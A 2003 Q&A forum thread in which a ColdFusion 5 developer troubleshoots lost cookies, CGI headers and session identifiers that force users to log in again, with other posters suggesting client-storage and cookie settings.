dbabbitt
asked on
How do I stop losing my cookies and stay logged in?
Hi Guys!
I am running CF Server 5. After the rash of MS updates a few weeks ago, sometimes when I click on a form link, I lose my User_Info cookie that tells me if I'm logged in or not. This causes the Application.cfm to cf include the login page and abort.
To start off with, I have logged in and have my User_Info cookie. Next, I click on a link like this:
<form
action="http://www.myproductionserver.net/the/path/to_my_script_is.cfm?CFID=39639&CFTOKEN=74431736&Tab=7&Type=Supervisor&E5180B05-1ED5-4B72-BFBE5AF173D2E69F"
method="post"
name="tab7Form"
style="margin-bottom: 0px; margin-top: 0px;"
><a
href="javascript:this.docu ment.forms ['tab7Form '].submit( )"
class="nameLinkSmall"
onmouseout="window.status= ' ';return(true);"
onmouseover="window.status ='http://www.myproductionserver.net/the/path/to_my_script_is.cfm?CFID=39639&CFTOKEN=74431736&Tab=7&Type=Supervisor&E5180B05-1ED5-4B72-BFBE5AF173D2E69F';return(true);"
>Supervisor</a></form>
and be forced to log in!!
Application.cfm looks like this:
<!--- Deserialize the contents of the cookie --->
<cftry>
<cfif IsDefined('Cookie.User_Inf o')>
<cfwddx
action="WDDX2CFML"
input="#Cookie.User_Info#"
output="Access"
>
<cfelse>
<cfif IsDefined('Client.User_Inf o')><cfwdd x
action="WDDX2CFML"
input="#Client.User_Info#"
output="Access"
></cfif>
</cfif>
<cfcatch><cfabort></cfcatc h>
</cftry>
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzA pplication Name"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession TimeOut#"
>
<cfif NOT (IsDefined('Access') OR ListFindNoCase(MyTrustedTe mplateList , CGI.SCRIPT_NAME) OR IsAuthenticated('MyProduct ionServerz Applicatio nName'))>
<!--- The user is NOT authenticated --->
<cfscript>
ShowLogin = "False";
</cfscript>
<cftry>
<cfscript>
if((NOT IsDefined('Form.User_Logon ')) OR (NOT Len(Trim(Form.User_Logon)) )) {
if(IsDefined('URL.User_Log on') AND Len(Trim(URL.User_Logon))) {
/* This sometimes blows up if the value to be decrypted is not valid */
Form.User_Logon = Decrypt(URL.User_Logon, 'MyUserLogonDecryptionKey' );
}
}
if((NOT IsDefined('Form.User_Passw ord')) OR (NOT Len(Trim(Form.User_Passwor d)))) {
if(IsDefined('URL.User_Pas sword') AND Len(Trim(URL.User_Password ))) {
/* This sometimes blows up if the value to be decrypted is not valid */
Form.User_Password = Decrypt(URL.User_Password, 'MyUserPasswordDecryptionK ey');
}
}
</cfscript>
<cfcatch></cfcatch>
</cftry>
<cfif IsDefined('Form.User_Logon ') and IsDefined('Form.User_Passw ord')>
<!--- The login form was submitted --->
<cftry>
<cfauthenticate
securitycontext="MyProduct ionServerz Applicatio nName"
username="#Form.User_Logon #"
password="#Form.User_Passw ord#"
setcookie="YES"
>
<cfif NOT (IsDefined('Access') OR ListFindNoCase(TrustList, CGI.SCRIPT_NAME))>
<cfinclude template="/includes/check_ userz_pass word.cfm">
<cfif PleaseTryAgain>
<cfoutput><table
height="100%"
width="100%"
><tr><td
align="center"
>The login name and password you supplied were incorrect.</td></tr></tabl e></cfoutp ut>
<cfabort>
<cfelse>
<cfinclude template="/path/log_user_i nto_centra l_station. cfm">
</cfif>
</cfif>
<cfcatch type="security">
<!--- Security error in login occurred, show login again --->
<h3>Invalid Login</h3>
<cfset ShowLogin="Yes">
</cfcatch>
</cftry>
<cfelse>
<!--- The login was NOT detected --->
<cfset ShowLogin="Yes">
</cfif>
<cfif ShowLogin>
<cfset EmailTitle="Forced Login From the Application Template">
<cfinclude template="/includes/send_e mail_to_th e_develope r.cfm">
<cfinclude template="/index.cfm">
<cfabort>
</cfif>
</cfif>
The email the developer gets when this forced login happens is in HTML form. It's just a series of cf dumps:
Forced Login From the Application Template
-------------------------- ---------- ---------- ---------- ---------- ---------- ----
TheLast5StaffWhoHaveLogged InAtThisAd dress
AGENCY_NAME LOGIN_TIME NAME_FIRST NAME_LAST PROGRAM_NAME USERS_ID
My Agency, Inc. 2003-03-20 08:48:26 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:47:27 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:46:26 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:45:27 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:44:42 Dave Babbitt My Program 443
Application
APPLICATIONNAME MYPRODUCTIONSERVERZAPPLICA TIONNAME
DATEMASK m/d/yyyy
DEFAULTFONT Trebuchet MS
TIMEMASK h:mm tt
CGI
AUTH_PASSWORD
AUTH_TYPE
AUTH_USER
CERT_COOKIE
CERT_FLAGS
CERT_ISSUER
CERT_KEYSIZE
CERT_SECRETKEYSIZE
CERT_SERIALNUMBER
CERT_SERVER_ISSUER
CERT_SERVER_SUBJECT
CERT_SUBJECT
CF_TEMPLATE_PATH X:\INETPUB\WWWROOT\whateve r\the\path \to_my_scr ipt_is.cfm
CONTENT_LENGTH 0
CONTENT_TYPE application/x-www-form-url encoded
GATEWAY_INTERFACE CGI/1.1
HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpo int, application/vnd.ms-excel, application/msword, application/x-shockwave-fl ash, */*
HTTPS off
HTTPS_KEYSIZE
HTTPS_SECRETKEYSIZE
HTTPS_SERVER_ISSUER
HTTPS_SERVER_SUBJECT
PATH_INFO /the/path/to_my_script_is. cfm
PATH_TRANSLATED X:\INETPUB\WWWROOT\whateve r\the\path \to_my_scr ipt_is.cfm
QUERY_STRING CFID=39639&CFTOKEN=7443173 6&Tab=8&Ty pe=Mail&68 70E1EB-219 B-41BD-88A 28FC5A7AFA C25
[Edited by Cerebro]
REMOTE_ADDR 127.0.0.1
REMOTE_HOST 127.0.0.1
[Edited by Cerebro]
REMOTE_USER
REQUEST_METHOD POST
SCRIPT_NAME /the/path/to_my_script_is. cfm
SERVER_NAME www.myproductionserver.net
SERVER_PORT 80
SERVER_PORT_SECURE 0
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE Microsoft-IIS/5.0
WEB_SERVER_API ISAPI
Cookie
CFID 39639
CFTOKEN 74431736
Form
Request
CFADUMPINITED FALSE
Session
CFID 39639
CFTOKEN 74431736
SESSIONID MYPRODUCTIONSERVERZAPPLICA TIONNAME_3 9639_74431 736
URLTOKEN CFID=39639&CFTOKEN=7443173 6
URL
CFID 39639
CFTOKEN 74431736
OVERRIDE_DEBUG_MODE DEBUG
TAB 8
TYPE Mail
Client Variables
CFID 39639
CFToken 74431736
URLToken CFID=39639&CFTOKEN=7443173 6
HitCount 4
TimeCreated {ts '2003-03-20 08:50:51'}
LastVisit {ts '2003-03-20 08:51:05'}
How do I stop losing my cookies and stay logged in?
I am running CF Server 5. After the rash of MS updates a few weeks ago, sometimes when I click on a form link, I lose my User_Info cookie that tells me if I'm logged in or not. This causes the Application.cfm to cf include the login page and abort.
To start off with, I have logged in and have my User_Info cookie. Next, I click on a link like this:
<form
action="http://www.myproductionserver.net/the/path/to_my_script_is.cfm?CFID=39639&CFTOKEN=74431736&Tab=7&Type=Supervisor&E5180B05-1ED5-4B72-BFBE5AF173D2E69F"
method="post"
name="tab7Form"
style="margin-bottom: 0px; margin-top: 0px;"
><a
href="javascript:this.docu
class="nameLinkSmall"
onmouseout="window.status=
onmouseover="window.status
>Supervisor</a></form>
and be forced to log in!!
Application.cfm looks like this:
<!--- Deserialize the contents of the cookie --->
<cftry>
<cfif IsDefined('Cookie.User_Inf
<cfwddx
action="WDDX2CFML"
input="#Cookie.User_Info#"
output="Access"
>
<cfelse>
<cfif IsDefined('Client.User_Inf
action="WDDX2CFML"
input="#Client.User_Info#"
output="Access"
></cfif>
</cfif>
<cfcatch><cfabort></cfcatc
</cftry>
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzA
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession
>
<cfif NOT (IsDefined('Access') OR ListFindNoCase(MyTrustedTe
<!--- The user is NOT authenticated --->
<cfscript>
ShowLogin = "False";
</cfscript>
<cftry>
<cfscript>
if((NOT IsDefined('Form.User_Logon
if(IsDefined('URL.User_Log
/* This sometimes blows up if the value to be decrypted is not valid */
Form.User_Logon = Decrypt(URL.User_Logon, 'MyUserLogonDecryptionKey'
}
}
if((NOT IsDefined('Form.User_Passw
if(IsDefined('URL.User_Pas
/* This sometimes blows up if the value to be decrypted is not valid */
Form.User_Password = Decrypt(URL.User_Password,
}
}
</cfscript>
<cfcatch></cfcatch>
</cftry>
<cfif IsDefined('Form.User_Logon
<!--- The login form was submitted --->
<cftry>
<cfauthenticate
securitycontext="MyProduct
username="#Form.User_Logon
password="#Form.User_Passw
setcookie="YES"
>
<cfif NOT (IsDefined('Access') OR ListFindNoCase(TrustList, CGI.SCRIPT_NAME))>
<cfinclude template="/includes/check_
<cfif PleaseTryAgain>
<cfoutput><table
height="100%"
width="100%"
><tr><td
align="center"
>The login name and password you supplied were incorrect.</td></tr></tabl
<cfabort>
<cfelse>
<cfinclude template="/path/log_user_i
</cfif>
</cfif>
<cfcatch type="security">
<!--- Security error in login occurred, show login again --->
<h3>Invalid Login</h3>
<cfset ShowLogin="Yes">
</cfcatch>
</cftry>
<cfelse>
<!--- The login was NOT detected --->
<cfset ShowLogin="Yes">
</cfif>
<cfif ShowLogin>
<cfset EmailTitle="Forced Login From the Application Template">
<cfinclude template="/includes/send_e
<cfinclude template="/index.cfm">
<cfabort>
</cfif>
</cfif>
The email the developer gets when this forced login happens is in HTML form. It's just a series of cf dumps:
Forced Login From the Application Template
--------------------------
TheLast5StaffWhoHaveLogged
AGENCY_NAME LOGIN_TIME NAME_FIRST NAME_LAST PROGRAM_NAME USERS_ID
My Agency, Inc. 2003-03-20 08:48:26 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:47:27 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:46:26 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:45:27 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:44:42 Dave Babbitt My Program 443
Application
APPLICATIONNAME MYPRODUCTIONSERVERZAPPLICA
DATEMASK m/d/yyyy
DEFAULTFONT Trebuchet MS
TIMEMASK h:mm tt
CGI
AUTH_PASSWORD
AUTH_TYPE
AUTH_USER
CERT_COOKIE
CERT_FLAGS
CERT_ISSUER
CERT_KEYSIZE
CERT_SECRETKEYSIZE
CERT_SERIALNUMBER
CERT_SERVER_ISSUER
CERT_SERVER_SUBJECT
CERT_SUBJECT
CF_TEMPLATE_PATH X:\INETPUB\WWWROOT\whateve
CONTENT_LENGTH 0
CONTENT_TYPE application/x-www-form-url
GATEWAY_INTERFACE CGI/1.1
HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpo
HTTPS off
HTTPS_KEYSIZE
HTTPS_SECRETKEYSIZE
HTTPS_SERVER_ISSUER
HTTPS_SERVER_SUBJECT
PATH_INFO /the/path/to_my_script_is.
PATH_TRANSLATED X:\INETPUB\WWWROOT\whateve
QUERY_STRING CFID=39639&CFTOKEN=7443173
[Edited by Cerebro]
REMOTE_ADDR 127.0.0.1
REMOTE_HOST 127.0.0.1
[Edited by Cerebro]
REMOTE_USER
REQUEST_METHOD POST
SCRIPT_NAME /the/path/to_my_script_is.
SERVER_NAME www.myproductionserver.net
SERVER_PORT 80
SERVER_PORT_SECURE 0
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE Microsoft-IIS/5.0
WEB_SERVER_API ISAPI
Cookie
CFID 39639
CFTOKEN 74431736
Form
Request
CFADUMPINITED FALSE
Session
CFID 39639
CFTOKEN 74431736
SESSIONID MYPRODUCTIONSERVERZAPPLICA
URLTOKEN CFID=39639&CFTOKEN=7443173
URL
CFID 39639
CFTOKEN 74431736
OVERRIDE_DEBUG_MODE DEBUG
TAB 8
TYPE Mail
Client Variables
CFID 39639
CFToken 74431736
URLToken CFID=39639&CFTOKEN=7443173
HitCount 4
TimeCreated {ts '2003-03-20 08:50:51'}
LastVisit {ts '2003-03-20 08:51:05'}
How do I stop losing my cookies and stay logged in?
ASKER
If I hit Ctrl-F5 when I sent to the forced relogin page, it always corrects itself and gives me the intended page.
Did you try "Registry" for your client storage
<cfapplication name="app_name"
clientmanagement="Yes"
sessionmanagement="Yes"
setclientcookies="Yes"
sessiontimeout="#CreateTim eSpan(0,0, 30,0)#"
applicationtimeout="#Creat eTimeSpan( 2,0,0,0)#"
clientstorage="REGISTRY">
<cfapplication name="app_name"
clientmanagement="Yes"
sessionmanagement="Yes"
setclientcookies="Yes"
sessiontimeout="#CreateTim
applicationtimeout="#Creat
clientstorage="REGISTRY">
ASKER
It used to be on registry, but I'm tired of this problem, so I verified my ODBC connection to my Cold_Fusion_Client_Variabl es database and am now using that. It has no effect.
ASKER
It's wierd, if I pass just the user logon in a hidden variable, submitting the form no longer causes a forced re-login. It means there is probably a flaw in my form field inpection logic in Application.cfm
ASKER
I don't think it's a flaw in my form field inpection logic in Application.cfm. Try these instructions to prove it:
1) Log into
[Edited by Cerebro]
http://localhost/RentACoder/test_form_field_inpection_logic.cfm
[Edited by Cerebro]
using RentACoder as the User ID and RentACoder as the Password.
2) Click the submit button without checking any boxes.
3) If it forces you to re-login, that's the problem I'm trying to solve. Just hit Ctrl-F5 to continue.
1) Log into
[Edited by Cerebro]
http://localhost/RentACoder/test_form_field_inpection_logic.cfm
[Edited by Cerebro]
using RentACoder as the User ID and RentACoder as the Password.
2) Click the submit button without checking any boxes.
3) If it forces you to re-login, that's the problem I'm trying to solve. Just hit Ctrl-F5 to continue.
ASKER
For a different take on the problem, check out http://localhost/RentACoder/test_cgi_http_host.cfm with the same instructions as above.
[Edited by Cerebro]
[Edited by Cerebro]
ASKER
The environmental variables that show up different when I get a forced login:
1) CGI.HTTP_ACCEPT (didn't disappear but now it's image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpo int, application/vnd.ms-excel, application/msword, application/x-shockwave-fl ash, */*)
2) (disappeared)
3) (disappeared)
4) (disappeared)
5) (disappeared)
6) (disappeared)
7) (disappeared)
8) (disappeared)
9) (disappeared)
10) (disappeared)
11) (disappeared)
The environmental variables that re-appear when I hit Ctrl-F5:
1) CGI.HTTP_ACCEPT (now it's back to */*)
2) CGI.HTTP_ACCEPT_ENCODING
3) CGI.HTTP_ACCEPT_LANGUAGE
4) CGI.HTTP_CACHE_CONTROL
5) CGI.HTTP_CONNECTION
6) CGI.HTTP_CONTENT_LENGTH
7) CGI.HTTP_CONTENT_TYPE
8) CGI.HTTP_COOKIE
9) CGI.HTTP_HOST
10) CGI.HTTP_REFERER
11) CGI.HTTP_USER_AGENT
Does having the CGI.HTTP_ACCEPT change give anybody any clue as to what's going on? As you can see, losing CGI.HTTP_COOKIE is critical because that means losing my cookies.
I found that if I COMPLETELY changed over from HTTP_HOST to SERVER_NAME the problem DOESN'T go away. Check out https://www.experts-exchange.com/questions/20486370/Why-is-my-CGI-HTTP-HOST-an-empty-string-now.html for further details.
1) CGI.HTTP_ACCEPT (didn't disappear but now it's image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpo
2) (disappeared)
3) (disappeared)
4) (disappeared)
5) (disappeared)
6) (disappeared)
7) (disappeared)
8) (disappeared)
9) (disappeared)
10) (disappeared)
11) (disappeared)
The environmental variables that re-appear when I hit Ctrl-F5:
1) CGI.HTTP_ACCEPT (now it's back to */*)
2) CGI.HTTP_ACCEPT_ENCODING
3) CGI.HTTP_ACCEPT_LANGUAGE
4) CGI.HTTP_CACHE_CONTROL
5) CGI.HTTP_CONNECTION
6) CGI.HTTP_CONTENT_LENGTH
7) CGI.HTTP_CONTENT_TYPE
8) CGI.HTTP_COOKIE
9) CGI.HTTP_HOST
10) CGI.HTTP_REFERER
11) CGI.HTTP_USER_AGENT
Does having the CGI.HTTP_ACCEPT change give anybody any clue as to what's going on? As you can see, losing CGI.HTTP_COOKIE is critical because that means losing my cookies.
I found that if I COMPLETELY changed over from HTTP_HOST to SERVER_NAME the problem DOESN'T go away. Check out https://www.experts-exchange.com/questions/20486370/Why-is-my-CGI-HTTP-HOST-an-empty-string-now.html for further details.
when you use CGI.Server_Name does the value display differently or blank?
You shouldn't lose your cookie.. is the cookie set for your domain or a url? turn on cookie prompting and see how the cookies are set. Output the cookies on each page to make sure that cookies are sent back by the browser (it maybe a domain/path issue)
CJ
You shouldn't lose your cookie.. is the cookie set for your domain or a url? turn on cookie prompting and see how the cookies are set. Output the cookies on each page to make sure that cookies are sent back by the browser (it maybe a domain/path issue)
CJ
add this to your cfapplication:
SetDomainCookies="yes"
CJ
SetDomainCookies="yes"
CJ
ASKER
Adding SetDomainCookies="yes" to my cfapplication has no effect, CGI.HTTP_ACCEPT_ENCODING, CGI.HTTP_ACCEPT_LANGUAGE, CGI.HTTP_CACHE_CONTROL, CGI.HTTP_CONNECTION, CGI.HTTP_CONTENT_LENGTH, CGI.HTTP_CONTENT_TYPE, CGI.HTTP_COOKIE, CGI.HTTP_HOST, CGI.HTTP_REFERER, and CGI.HTTP_USER_AGENT are still missing and I still get forced to log back on.
In other words, I'm not just losing my cookie. I'm losing the ability of my browser to send cookies, among other things.
In other words, I'm not just losing my cookie. I'm losing the ability of my browser to send cookies, among other things.
ASKER
Sometimes the Client.User_Info is still set so just at the last minute I'm converting that into the Access structure. Wierd.
HTTP_* are browser provided values.. they are not gaurunteed to exist.
when you turn on cookie prompting you see the cookie get set right? What is the domain of the cookie and its path?
if the browser is not sending cookies back to the server it maybe more of an environment issue with the browser rather than the server.
I have never had a problem using cookies in a cfapp.
SetDomainCookies should help b/c it will set the cfid, cftoken cookies at the domain level so a subdomain or path has no effect on them.
CJ
when you turn on cookie prompting you see the cookie get set right? What is the domain of the cookie and its path?
if the browser is not sending cookies back to the server it maybe more of an environment issue with the browser rather than the server.
I have never had a problem using cookies in a cfapp.
SetDomainCookies should help b/c it will set the cfid, cftoken cookies at the domain level so a subdomain or path has no effect on them.
CJ
ASKER
Sometimes the Client.User_Info is still set so just at the last minute I'm converting that into the Access structure. Wierd.
a few things I noticed:
why do you have clientmanagement turned on.. do you use something specific to require that?
Either your session data is not being set or your authentication is not working right.
try outputting everything that you check for (verify that the user is logged in with) onto the screen before you do the login check. (once you login.. change the code and test it out) See if something is missing.
CJ
why do you have clientmanagement turned on.. do you use something specific to require that?
Either your session data is not being set or your authentication is not working right.
try outputting everything that you check for (verify that the user is logged in with) onto the screen before you do the login check. (once you login.. change the code and test it out) See if something is missing.
CJ
Oops I now see that you are using Client.User_Info. Any reason for using that instead of just Session.User_Info?
CJ
CJ
ASKER
How do I turn on cookie prompting? I overrode automatic cookie handling in the advanced privacy settings, but didn't get any notification when I logged into my site. It should have prompted me at /login.cfm that I was getting a cookie, right?
That should work. I use Mozilla for that kind of stuff b/c it lets me see the values of my cookies as I am progressing through the site.
CJ
CJ
ASKER
You need to understand that this is happening to about a dozen different people. Their user agents look like this:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
I would think that this is more of a browser setting than code issue.
do use the option of:
SetDomainCookies=Yes
The other issue could be that maybe those users are blocking your site from setting cookies? What is the site URL and what is the domain that the cookies get set for?
Are you able to reproduce this or is it just specific to those users?
CJ
do use the option of:
SetDomainCookies=Yes
The other issue could be that maybe those users are blocking your site from setting cookies? What is the site URL and what is the domain that the cookies get set for?
Are you able to reproduce this or is it just specific to those users?
CJ
ASKER
This is happening to myself and a few dozen other users. It started happening without any changes to the code.
ASKER
I can make it happen anytime I want by pushing an arbitrary submit button.
hi,
what is the "EXPIRES" property of CFCOOKIE set to ???
if u havent set ne-thing there - then its browser based & will get deleted once the browser window is closed
but if u ahve set the expires property to some timeperiod -then u will have it on the clients machine till that period is elapsed.
also have client-storage mech for storing the cookied - dont use registry if u have many users on ur site - i had used it before & my registery was overloaded with 2Lacs of folder storing client info - which was a sheer waste of space & slowed down my server !
K'Rgds
Anand
what is the "EXPIRES" property of CFCOOKIE set to ???
if u havent set ne-thing there - then its browser based & will get deleted once the browser window is closed
but if u ahve set the expires property to some timeperiod -then u will have it on the clients machine till that period is elapsed.
also have client-storage mech for storing the cookied - dont use registry if u have many users on ur site - i had used it before & my registery was overloaded with 2Lacs of folder storing client info - which was a sheer waste of space & slowed down my server !
K'Rgds
Anand
ASKER
Why the fixation on the cookie? When I get a forced logon, there are no cookies to allow or block or check the Domain or Expires properties of because there is no CGI.HTTP_COOKIE to speak of. This is something bigger than the cookies, guys. I'm also losing my CGI.HTTP_ACCEPT_ENCODING, CGI.HTTP_ACCEPT_LANGUAGE, CGI.HTTP_CACHE_CONTROL, CGI.HTTP_CONNECTION, CGI.HTTP_CONTENT_LENGTH, CGI.HTTP_CONTENT_TYPE, CGI.HTTP_HOST, CGI.HTTP_REFERER, and CGI.HTTP_USER_AGENT.
Can you post the code where you set the cookies?
Also, when you converted the client storage mechanism from registry to SQL or access. Did you convert the data? Did you clean out the registry afterwards?
Also, when you converted the client storage mechanism from registry to SQL or access. Did you convert the data? Did you clean out the registry afterwards?
ASKER
When I converted the client storage mechanism from registry to SQL, I did not convert the data. Afterwards, cleaning out the registry, HKEY_LOCAL_MACHINE\SOFTWAR E\Allaire\ ColdFusion \
CurrentVersion\Clients took almost a minute to expand in regedit. I deleted the whole key and restarted the main ColdFusion Services. I opened a new browser, logged into the site, clicked on a form link, and... no joy. It still gives me the re-login form. It also still misinterprets what kind of browser I am using (because of the missing CGI.HTTP_USER_AGENT). Holding down the Ctrl key and hitting F5 then clicking the Retry button works every time to get back what I had originally.
CurrentVersion\Clients took almost a minute to expand in regedit. I deleted the whole key and restarted the main ColdFusion Services. I opened a new browser, logged into the site, clicked on a form link, and... no joy. It still gives me the re-login form. It also still misinterprets what kind of browser I am using (because of the missing CGI.HTTP_USER_AGENT). Holding down the Ctrl key and hitting F5 then clicking the Retry button works every time to get back what I had originally.
ASKER
At the bottom of the log user into central station template, it looks like this:
<!--- Serialize packet --->
<CFWDDX ACTION="CFML2WDDX" INPUT="#Access#" OUTPUT="myPacket">
<!--- Create cookie with contents of the packet, make sure it expires in a day. --->
<cfcookie name="User_Info" value="#myPacket#" expires="1">
<!--- Serialize packet --->
<CFWDDX ACTION="CFML2WDDX" INPUT="#Access#" OUTPUT="myPacket">
<!--- Create cookie with contents of the packet, make sure it expires in a day. --->
<cfcookie name="User_Info" value="#myPacket#" expires="1">
ASKER
I'm now logging the user in like this:
<!--- Serialize packet --->
<CFWDDX ACTION="CFML2WDDX" INPUT="#Access#" OUTPUT="myPacket">
<!--- Create cookie with contents of the packet, make sure it expires in a day. --->
<cfcookie name="User_Info" value="#myPacket#" expires="1">
<cfscript>
/* Create client variable with contents of the packet */
Client.User_Info = myPacket;
/* Create session variable with contents of the packet */
StructInsert(Session, 'User_Info', myPacket, true);
</cfscript>
Before I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above exist.
2) Cookie.CFID = 21, Cookie.CFMAGIC = 21:73159472, Cookie.CFTOKEN = 73159472, and Cookie.USER_INFO exists.
3) Session.CFID = 21, Session.CFTOKEN 73159472, and Session.USER_INFO exists.
4) Client.CFID = 21, Client.CFToken = 73159472, and Client.USER_INFO exists.
After I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above (accept for CGI.HTTP_ACCEPT) no longer exist.
2) Cookie.CFID = 24, Cookie.CFMAGIC = 24:85905525, Cookie.CFTOKEN = 85905525, and Cookie.USER_INFO no longer exists.
3) Session.CFID = 24, Session.CFTOKEN 85905525, and Session.USER_INFO no longer exists.
4) Client.CFID = 24, Client.CFToken = 85905525, and Client.USER_INFO no longer exists.
<!--- Serialize packet --->
<CFWDDX ACTION="CFML2WDDX" INPUT="#Access#" OUTPUT="myPacket">
<!--- Create cookie with contents of the packet, make sure it expires in a day. --->
<cfcookie name="User_Info" value="#myPacket#" expires="1">
<cfscript>
/* Create client variable with contents of the packet */
Client.User_Info = myPacket;
/* Create session variable with contents of the packet */
StructInsert(Session, 'User_Info', myPacket, true);
</cfscript>
Before I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above exist.
2) Cookie.CFID = 21, Cookie.CFMAGIC = 21:73159472, Cookie.CFTOKEN = 73159472, and Cookie.USER_INFO exists.
3) Session.CFID = 21, Session.CFTOKEN 73159472, and Session.USER_INFO exists.
4) Client.CFID = 21, Client.CFToken = 73159472, and Client.USER_INFO exists.
After I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above (accept for CGI.HTTP_ACCEPT) no longer exist.
2) Cookie.CFID = 24, Cookie.CFMAGIC = 24:85905525, Cookie.CFTOKEN = 85905525, and Cookie.USER_INFO no longer exists.
3) Session.CFID = 24, Session.CFTOKEN 85905525, and Session.USER_INFO no longer exists.
4) Client.CFID = 24, Client.CFToken = 85905525, and Client.USER_INFO no longer exists.
it sweems as though your cfid and cftoken values are changing so you lose your session and client data (b/c the combination of the two identify the user)
when those change, the cf application thinks its a different/new user.
in:
!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzA pplication Name"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession TimeOut#"
>
What is the value of MySessionTimeOut?
Try this as an alternative CFAPPLICATION:
<cfapplication
name="MyProductionServerzA pplication Name"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession TimeOut#"
SETCLIENTCOOKIES="NO">
<!--- CF will not set the client cookies automatically, so
set them manually as per-session cookies --->
<CFLOCK SCOPE="SESSION" TYPE="READONLY" TIMEOUT="5">
<CFCOOKIE NAME="CFID" VALUE="#SESSION.CFID#">
<CFCOOKIE NAME="CFTOKEN" VALUE="#SESSION.CFTOKEN#">
</CFLOCK>
For Client Management:
<!--- With Client Management Enabled --->
!--- CF will not set the client cookies automatically,
so set them manually as per-session cookies --->
<CFCOOKIE NAME="CFID" VALUE="#CLIENT.CFID#">
<CFCOOKIE NAME="CFTOKEN" VALUE="#CLIENT.CFTOKEN#">
Now since you have client and session management enabled. You will have to make sure that cfid and cftoken for both client and session scope are the same. Try outputting them.
A good read:
http://www.macromedia.com/support/coldfusion/ts/documents/tn17915.htm
CJ
when those change, the cf application thinks its a different/new user.
in:
!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzA
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession
>
What is the value of MySessionTimeOut?
Try this as an alternative CFAPPLICATION:
<cfapplication
name="MyProductionServerzA
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession
SETCLIENTCOOKIES="NO">
<!--- CF will not set the client cookies automatically, so
set them manually as per-session cookies --->
<CFLOCK SCOPE="SESSION" TYPE="READONLY" TIMEOUT="5">
<CFCOOKIE NAME="CFID" VALUE="#SESSION.CFID#">
<CFCOOKIE NAME="CFTOKEN" VALUE="#SESSION.CFTOKEN#">
</CFLOCK>
For Client Management:
<!--- With Client Management Enabled --->
!--- CF will not set the client cookies automatically,
so set them manually as per-session cookies --->
<CFCOOKIE NAME="CFID" VALUE="#CLIENT.CFID#">
<CFCOOKIE NAME="CFTOKEN" VALUE="#CLIENT.CFTOKEN#">
Now since you have client and session management enabled. You will have to make sure that cfid and cftoken for both client and session scope are the same. Try outputting them.
A good read:
http://www.macromedia.com/support/coldfusion/ts/documents/tn17915.htm
CJ
ASKER
I'm now logging the user in like this:
<!--- Serialize packet --->
<CFWDDX ACTION="CFML2WDDX" INPUT="#Access#" OUTPUT="myPacket">
<!--- Create cookie with contents of the packet, make sure it expires in a day. --->
<cfcookie name="User_Info" value="#myPacket#" expires="1">
<cfscript>
/* Create client variable with contents of the packet */
Client.User_Info = myPacket;
/* Create session variable with contents of the packet */
StructInsert(Session, 'User_Info', myPacket, true);
</cfscript>
Before I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above exist.
2) Cookie.CFID = 21, Cookie.CFMAGIC = 21:73159472, Cookie.CFTOKEN = 73159472, and Cookie.USER_INFO exists.
3) Session.CFID = 21, Session.CFTOKEN 73159472, and Session.USER_INFO exists.
4) Client.CFID = 21, Client.CFToken = 73159472, and Client.USER_INFO exists.
After I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above (accept for CGI.HTTP_ACCEPT) no longer exist.
2) Cookie.CFID = 24, Cookie.CFMAGIC = 24:85905525, Cookie.CFTOKEN = 85905525, and Cookie.USER_INFO no longer exists.
3) Session.CFID = 24, Session.CFTOKEN 85905525, and Session.USER_INFO no longer exists.
4) Client.CFID = 24, Client.CFToken = 85905525, and Client.USER_INFO no longer exists.
<!--- Serialize packet --->
<CFWDDX ACTION="CFML2WDDX" INPUT="#Access#" OUTPUT="myPacket">
<!--- Create cookie with contents of the packet, make sure it expires in a day. --->
<cfcookie name="User_Info" value="#myPacket#" expires="1">
<cfscript>
/* Create client variable with contents of the packet */
Client.User_Info = myPacket;
/* Create session variable with contents of the packet */
StructInsert(Session, 'User_Info', myPacket, true);
</cfscript>
Before I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above exist.
2) Cookie.CFID = 21, Cookie.CFMAGIC = 21:73159472, Cookie.CFTOKEN = 73159472, and Cookie.USER_INFO exists.
3) Session.CFID = 21, Session.CFTOKEN 73159472, and Session.USER_INFO exists.
4) Client.CFID = 21, Client.CFToken = 73159472, and Client.USER_INFO exists.
After I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above (accept for CGI.HTTP_ACCEPT) no longer exist.
